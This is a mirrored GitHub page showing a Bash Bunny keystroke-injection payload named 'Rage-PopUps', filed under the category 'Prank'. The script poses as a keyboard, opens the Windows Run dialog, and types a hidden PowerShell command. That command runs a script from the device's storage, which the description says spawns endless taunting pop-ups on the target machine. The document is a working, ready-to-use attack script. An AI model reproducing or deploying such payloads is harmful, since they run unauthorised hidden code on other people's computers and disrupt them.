mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* Add files via upload * Add files via upload * Add files via upload * Add files via upload * Add files via upload
23 lines
595 B
Plaintext
23 lines
595 B
Plaintext
# Title: Rage-PopUps
|
|
# Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details
|
|
# Author: I am Jakoby
|
|
# Version: 1.0
|
|
# Category: Prank
|
|
# Attackmodes: HID, Storage
|
|
# Target: Windows 10, 11
|
|
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
LED STAGE1
|
|
|
|
QUACK DELAY 3000
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
LED STAGE2
|
|
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Rage-PopUps.ps1')"
|
|
QUACK ENTER
|